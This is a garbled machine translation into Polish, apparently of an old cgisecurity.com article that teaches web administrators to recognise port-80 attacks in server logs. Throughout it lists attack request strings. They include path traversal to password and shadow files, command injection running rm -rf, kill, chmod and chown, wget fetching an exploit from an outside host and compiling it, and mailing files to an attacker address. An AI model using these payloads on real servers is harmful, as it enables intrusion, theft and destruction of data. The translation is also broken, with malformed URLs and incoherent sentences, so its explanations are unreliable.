I. Podsumowanie
II. Szczegółowy opis
III. Dalsze
IV. Wzajemne Analiza
V. transkodowanie
VI. Wnioski
[Abstract]
strona www 80 jako port usługi domyślnie, na różnych problemów związanych z bezpieczeństwem przechowywać w miejscu wydania, niektóre z tych luk pozwala atakującemu na uzyskanie nawet administratora systemu pozwolenia na wjazd w samym zakładzie, po to około 80 port ślady Zenomorph ataków badań, i powiem ci, jak znaleźć problemy z zapisów dziennika.
] Szczegóły [
O w części poprzez szereg wyświetlania Liezi na serwerach internetowych i aplikacji na ich ogólny atak, a jego ślady, które stanowią jedynie Liezi poważnego ataku, nie ma listę wszystkich form ataku, tym dziale Szczegółowy opis roli każdego ataku, jak i wykorzystać te luki do ataku.
(1) "." ".." Oraz wniosek "..."
Ślady te ataki są bardzo często do aplikacji internetowych i serwerów internetowych, które służy do umożliwić osobie atakującej lub robak-wirus program do zmiany serwera, ścieżkę, aby uzyskać dostęp do obszarów zamkniętych. Większość programów CGI z tych wad, ".." wniosku.
Przykład:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
To pokazuje, atakujący wniosek Liezi mosd ten plik, jeśli atakujący przełom zdolność katalogu głównego serwera WWW, a następnie uzyskać więcej informacji i uzyskania dodatkowych uprawnień.
(2) "% 20" wniosek
20% wartości hex 16 miejsc, ale to nie znaczy, możesz użyć czegokolwiek, ale podczas przeglądania dziennika znajdzie, to i serwer aplikacji internetowych działa na tej postaci może być skutecznie realizowane Dlatego należy dokładnie zapoznać się zalogować. Z drugiej strony, wniosek może czasem przyczynić się do wykonywania niektórych poleceń.
Przykład:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
To Liezi pokazuje atakującej na wykonanie polecenia unix, wymieniając całego katalogu dokumentów wymaganych, powodując atakującemu na dostęp do ważnych plików w systemie, aby pomóc mu w celu dalszego zapewnienia warunków uzyskiwania uprawnień.
(3) "% 00" wniosek
% 00 powiedział, że 16-bajtowy szesnastkowy pusty, był w stanie oszukać aplikacji internetowych i poprosić o inne typy plików.
Przykłady:
http://host/cgi-bin/lame.cgi?page=index.html
Może to być ważny wniosek w maszynie, jeśli atakujący wie o tym żądanie zakończyło się powodzeniem, będzie dalej szukać cgi procedur.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Być może program cgi nie akceptuje ten wniosek, ponieważ wniosek, by sprawdzić rozszerzenie pliku nazwy, takie jak: html.shtml lub innych rodzajów plików. Większość programów powiedzieć żądanego typu pliku jest nieprawidłowy, tym razem będzie to powiedzieć osoba atakująca, która żądany plik musi być charakter rozszerzenie pliku typu, więc atakujący może uzyskać ścieżkę systemu, nazwę pliku, w wyniku czego swój system bardziej poufnych informacji
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd 00html%
Uwagę na to żądanie, to cheat program cgi, że dokument ten ma na celu określenie dopuszczalnych typów plików niektóre aplikacje skutecznych inspekcji pliku głupi wniosek, który jest powszechnie używany metod napastnika.
(4) "|" wniosek
To jest znak potoku w unix system, prośba o pomoc w realizacji wielu poleceń systemu w tym samym czasie.
Przykład:
# Cat access_log | grep-i ".."
(To polecenie wyświetli Zaloguj się ".." wniosek, powszechnie wykorzystywane w atakach i robaków znalezionych)
Często, że wiele aplikacji internetowych używa tej postaci, to również prowadzi do fałszywych alarmów w IDS logów.
W szczegółowej analizy aplikacji, więc korzyści z redukcji fałszywych alarmów w systemach wykrywania włamań.
Oto niektórzy ze Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Polecenie to wniosek, następujące są pewne zmiany w Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
Wniosek ten jest wyświetlany w systemie UNIX / etc wszystkie pliki z katalogu
http://host/cgi-bin/lame.cgi?page=cat% 20access_log% | grep 20% i 20 "lame"
Wykonania polecenia cat wniosek i polecenie grep będzie realizowany do zapoznania się z "lame"
(5) "," wniosek
Z systemów UNIX, ten charakter pozwala na wielokrotne wykonanie polecenia
Przykład:
# Id; uname-a
(Wykonanie polecenia id, a następnie wykonanie polecenia uname)
Niektóre z internetowych program tego znaku, może spowodować w IDS logi ostrzeżenie o awarii, należy dokładnie sprawdzić program internetowej, więc zmniejsza się ryzyko awarii wpisów IDS.
(6) " " i " " Wniosek
Należy sprawdzić logi zapis z dwóch znaków, z wielu powodów, pierwszy to znak, że dodatkowe dane w dokumencie
Przykład 1:
# Echo "Twoje hax0red h0 h0" / etc / motd (motd pisemne żądanie informacji w tym dokumencie)
Atakujący może łatwo korzystać wniosek jak wyżej ingerowanie w swoją stronę. Takich jak słynny RDS wykorzystać atakujący jest często używany do zmiany strony internetowej.
Przykład 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html można zauważyć, że język znaków tutaj, on również spędził znaków " "," ", takich ataków nie mogą spowodować atakującemu dostęp do systemu, to mylić ludzie myślą, jest to uzasadnione informacji strony internetowej (co prowadzi do osób odwiedza ten link, aby odwiedzić napastnikowi ustawić adres, to wniosek może być zakodowany na 16 znaków hex w postaci tak, aby ślady ataku nie jest tak oczywiste)
(7) "!" Wniosek
Wspólny język w tej postaci wniosku SS (Server Side Include) I atak, jeśli atakujący jest atakujący mylić użytkownik kliknie link ustawić, tak samo jak powyżej.
Przykład:
http://host1/something.php =
Lieh-tzu jest atakująca może to zrobić w pliku na stronie host2 z host1 pojawi się powyżej (oczywiście, wymaga od odwiedzających odwiedź atakującego ustawień połączenia. Wniosek ten może być przekształcony 16 hex kodowanie maski, nie jest łatwo znaleźć)
W tym samym czasie, takie podejście może również wykonywać polecenia władz stronie internetowej
Przykład:
http://host/something.php =
Lieh prowadzony w systemie zdalnym "id" polecenie, będzie on wyświetlany użytkownikowi witryny internetowej id, jest zazwyczaj "nobody" lub "www"
Ta forma pozwala również włączone ukryte pliki.
Przykład:
http://host/something.php =
Ukryte pliki. Htpasswd nie będą wyświetlane, Apache odmówi ustanowienia takich zasad. Ht formularz wniosku oraz logo SSI obwodnica takich ograniczeń, co prowadzi do problemów związanych z bezpieczeństwem
(8) "," Zapytanie
Ataki takie wykorzystywane do próby zdalnie wprowadzić procedury PHP aplikacji internetowych, może umożliwić wykonanie zamówienia, w zależności od ustawień serwera, jak i inne czynniki w miejscu pracy (np. php jest ustawione na tryb bezpieczny)
Przykład: http://host/something.php = passthru ("id ");?
W kilku prostych aplikacji php, może być na stronie internetowej na zdalnym praw użytkowników systemu do lokalnej komendy
(9) "` "wniosek
Ten znak później wykorzystywane do wykonywania poleceń w perl, znaki w aplikacji webowej nie jest często używane, więc jeśli widzisz, że w dzienniku, należy być bardzo ostrożnym
Przykład:
http://host/something.cgi = "id"
Napisz program w perl cgi pytanie doprowadzi do realizacji polecenia id
[Więcej]
Następująca sekcja omawia wykonywanie poleceń może więcej ataków, wraz z wnioskiem dokumentów, a jeśli masz wadę zdalnego wykonywania poleceń, należy jak sprawdzić odkrycia. Ta część jest po prostu dać dobry pomysł i poinformować system, co się dzieje, napastnicy próbują zaatakować Twój system ślady, ale nie listę wszystkich atakującej użyć poleceń i wniosków.
"/ Bin / ls"
To polecenie żąda od całej drogi, w wielu aplikacjach internetowych ma tę lukę, jeśli użytkownik zaloguje się w wielu miejscach taki wniosek, możliwe jest duża luka umożliwiająca zdalne wykonanie poleceń, ale niekoniecznie problem może być fałszywy alarm. Po raz kolejny przypomniał, aplikacja napisana www (CGI, ASP, PHP ... etc) jest podstawą bezpieczeństwa
Przykład:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Jest to windows skorupki, jeśli atakującemu na dostęp i uruchomić ten skrypt w ustawieniach serwera na warunkach dozwolone w komputerze z systemem Windows nie może zrobić nic, wiele robaków jest poprzez port 80, komunikacji zdalnej maszynie
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
To są dwa pliki binarne, jego problemy i / bin / ls, jak, jeśli użytkownik loguje się w wielu miejscach taki wniosek, możliwe jest duża luka umożliwiająca zdalne wykonanie poleceń, ale niekoniecznie problem może być fałszywy alarm.
To pokaż która część należy do użytkownika i grupy, które
Przykład:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Polecenie to może usuwać pliki bez właściwego wykorzystania jest bardzo niebezpieczne
Przykłady:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20% 20-rf * |
http://host/cgi-bin/bad.cgi?doh=rm% 20% 20-rf *;
"Wget i tftp" command
Polecenia te są często atakująca może zdobyć uprawnienia do pobierania plików, wget jest w unix polecenia, może być wykorzystany do pobrania backdoory, tftp jest pod unix dowodzenia i NT, jest używany do pobierania pliku. Niektóre robaki rozprzestrzeniają się przez IIS tftp skopiować wirusa do innych komputerów
Przykłady:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget 20http%: / / host2/Phantasmp.c | http:// host / cgi-bin / bad.cgi? doh =% 20http wget: / / www.hwa-security.net/Phantasmp.c;
"Cat" command
Polecenie to służy do wyświetlenia zawartości pliku, służy do odczytywania ważnych informacji, takich jak pliki konfiguracyjne, pliki hasła, pliki kredytowe i dokumenty można myśleć
Przykłady:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh =% cat 20/etc/motd;
"Echo" polecenia
Polecenie to służy do zapisywania danych do pliku, np. "index.html"
Przykłady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiwi% 20was% 20here"% 20 | 200day.txt% http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kiwi% 20was% 20here"% 20 % 200day.txt;
"Ps" command
Listę aktualnie uruchomionych procesów, powiedz atakującej zdalnego komputera z systemem te oprogramowanie, aby uzyskać pewne wyobrażenie o kwestie bezpieczeństwa, w celu uzyskania dalszych zezwoleń
Przykłady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? doh =% 20-ps aux;
"Kill i killall" command
systemów Unix w celu zniszczenia tego procesu, atakujący może użyć tej komendy, aby zatrzymać usługi systemu i procesów może zatrzeć ślady atakująca, niektóre wykorzystać przyniesie wiele procesów potomnych
Przykłady:% http://host/cgi-bin/bad.cgi?doh=../bin/kill 20-9% 200% | http://host/cgi-bin/bad.cgi?doh=kill 20 -9% 200;
"Uname" command
Polecenie to mówi atakujący nazwa zdalnego komputera, przez pewien czas, za pośrednictwem tej witryny, aby wiedzieć, które isp, osoba atakująca, która może być odwiedził dziś. Uname-a na żądanie zwykle, będą one zapisywane w pliku dziennika
Przykłady:% 20-http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname | http://host/cgi-bin/bad. cgi? doh =% 20-uname;
"DW, gcc, perl, python, etc ..." kompilacji / interpretacji poleceń
Atakujący poprzez wget lub tftp do pobrania wykorzystać i używać cc, kompilator gcc do kompilacji to w program wykonywalny, a ponadto uprawnienia dostępu
Przykłady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Po wyświetleniu dzienników znajdują się w "perl" python "Te instrukcje mogą być zdalnemu napastnikowi do pobrania perl, python skrypt, i starał się o przywileje lokalne
"Mail" polecenia
Włamywacze często wykorzystują ten system dowodzenia, pewne ważne dokumenty do własnej skrzynki pocztowej atakującego, ale również chętnych do e-mail ataki przeprowadzane są
Przykłady:% http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." i inne polecenia
systemów Unix, w celu umożliwienia im zmieniać praw
chown = pozwala na ustawienie właściciela pliku chmod = umożliwia ustawienie pliku chgrp pozwala = uprawnienia właściciela do zmiany uprawnień plików chsh grupy = możliwość zmiany powłoki użytkownika
Przykłady: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd |% http://host/cgi-bin/bad.cgi?doh=chsh 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp 20nobody%% | 20/etc/shadow
"/ Etc / passwd" file
Jest to system, w pliku haseł, zwykle cień off, i nie pozwala, aby zobaczyć zaszyfrowane hasło, ale osoba atakująca, która może wiedzieć, co jest ważne użytkownika i systemu ścieżkę, nazwę strony i inne informacje, jak to zwykle przez shadow off, więc atakujący zazwyczaj patrz plik / etc / shadow
"/ Etc / master.passwd"
Ten plik jest system BSD pliku haseł, zawiera zaszyfrowane hasło, plik na koncie root jest tylko do odczytu, a niektóre niewykwalifikowanych napastników otworzył próbować odczytać zawartość w środku., Jeśli witryna sieci Web jest uprawnienia administratora, aby uruchomić, atakujący jest, może odczytać zawartość w środku, wiele problemów dla administratorów systemu wejdzie jeden po drugim
"/ Etc / shadow"
Zawiera hasła szyfrowanego systemu, przeczytaj sam na koncie root i / et / master.passwd prawie
"/ Etc / motd"
Podczas logowania się użytkownika do systemu uniksowego, pojawia się informacja w "Message of the Day" pliku, zawiera ważne informacje o systemie i administrator użytkowników pewnego zbioru, użytkowników, którzy chcą zobaczyć tych, którzy nie są zawiera również informacje o wersji systemu, atakujący zazwyczaj zobaczyć ten plik, aby zrozumieć, co system działa na napastnika, następnym krokiem jest poszukiwanie tego typu systemu, wykorzystania i dalszego dostępu do systemu przywilejów
"/ Etc / hosts"
Dokument zawiera adres IP i sieci informacje, atakujący może uzyskać więcej informacji o ustawieniach sieciowych systemu
"/ Usr / local / apache / conf / httpd.conf"
Jest to serwer www Apache pliku konfiguracyjnego, atakujący może zrozumieć, jak CGI, SSI i inne informacje są dostępne
"/ Etc / inetd.conf"
Jest to plik konfiguracyjny inetd usługi, atakujący może poznać zdalnego komputera, start tych usług, czy korzystać z opakowania w celu kontroli dostępu, jeśli opakowanie stwierdzono kolejny, osoba atakująca, następnym krokiem będzie sprawdzenie "/ etc / hosts.allow" i "/ etc / hosts.deny", plik, a która może zmienić niektóre ustawienia, prawa dostępu
". Htpasswd. Htaccess oraz. Htgroup"
Pliki te są zazwyczaj używane w witrynie internetowej uwierzytelniania użytkownika, osoba atakująca zobaczyć te pliki, i uzyskać nazwę użytkownika i hasło, plik haseł. Htpasswd jest szyfrowana, przebić się przez kilka prostych proces szyfrowania, pozwala atakującemu na zalogowanie się w serwisie obszarów chronionych (zazwyczaj tego samego użytkownika z nazwą użytkownika i hasło, atakujący może nawet odwiedzić inne konto)
"Access_log i error_log"
Są to pliki log serwera Apache, napastnicy często zobaczyć te pliki, patrzeć na te żądania są rejestrowane, te i inne wnioski o różnych miejsc
Zazwyczaj atakujący będą modyfikować tych plików dziennika, takich jak jego dane adresowe, atakujący poprzez port 80 przez system tworzenia kopii zapasowych systemu i również nie działa, nie ma innego programu zapis zapis stanu systemu, co wykrywania włamań, staje się bardzo trudne do pracy
"[Drive-list]: winntrepairsam._ lub [literę dysku]: winntrepairsam"
Windows NT system plików hasłem, czy zdalne polecenie nie może zostać zrealizowany, napastnicy zwykle żądanie tych dokumentów, a następnie "l0pht crack" rodzaju zautomatyzowane narzędzia do zgryzienia, jeśli atakujący próbuje atakować administratora pliku hasło, jeśli sukces to zdalny komputer będzie Atakujący kontroli
[Analiza przelewowy]
W tym artykule nie powiem zbyt wiele o przepełnienie tematu, dam, co te zjawiska i zauważyć ślady i szczególną troskę, bufor jest często atakowany przez konwersję kodu atakującego i trudne do znalezienia innych sposobów na osiągnięcie
Oto prosty Lie Zi
Przykład: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA aaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Zhege pokazuje Liezi rację atak na wniosek wysłać wiele program znaków, w celu przetestowania programu przepełnienie bufora, przepełnienie bufora polecenia zdalnego Zhu Ji Zhixing Keyihuode zgody, jeśli setuid Juyou i jest własnością administratora programu, poprzez przepełnienie, mogą uzyskać dostęp do całego systemu, jeśli nie jak program setuid, to przepełnienie tylko przez uruchomienie witryny internetowej praw użytkownika
Nie można powiedzieć o wszystkich okolicznościach, ale należy regularnie sprawdzać pliku dziennika, jeśli ten dzień nagle znalazłem wiele wniosków, ale zwykle nie więcej niż wniosek, oznacza to, poddawane są na ataki przepełnienia, oczywiście, może być również Nowy atak robaka
[Transkodowanie]
Wszystkie ataki powyżej żądanie, atakujący systemy IDS zazwyczaj wie, często mechaniczne wniosek sprawdzić, zazwyczaj atakujący wykorzysta narzędzie do konwersji danych do konwersji formatu zawartości 16 wniosek zespołu, w wyniku czego IDS ignoruje te żądania, Znamy tę lukę CGI skanowania narzędzie, które jest dobrym Liezi Whisker. Po wyświetleniu dziennika czasu znaleziono wiele 16-band, a nie kilka znaków wspólnych, atakujący mogą próbować korzystać z niektórych sposoby na ataki na system
Szybki sposób pliku dziennika wniosek o te 16 hex, skopiuj go do przeglądarki, może zostać zamieniona na prawo wniosek i wyświetlane treści wniosku, jeśli nie odwagę, aby podjąć to ryzyko, prosty człowiek ASCII, może udzielić Ci poprawny kod.
] Wnioski [
Ten artykuł nie obejmuje wszystkich 80 portów ataku, ale w większości były cytowane więcej niż ogólny atak, i powiedzieć jak sprawdzić logi, a jak dodać takie jak liczba reguł IDS, napisz jej celem jest web administrator systemu powinien obawiać się o co warto w tym samym czasie, mam nadzieję, że ten artykuł pomaga web developerzy program do pisania lepszych programów
Z UWAGA: Jeśli masz jakieś uwagi i sugestie, wyślij e-mail admin@cgisecurity.com.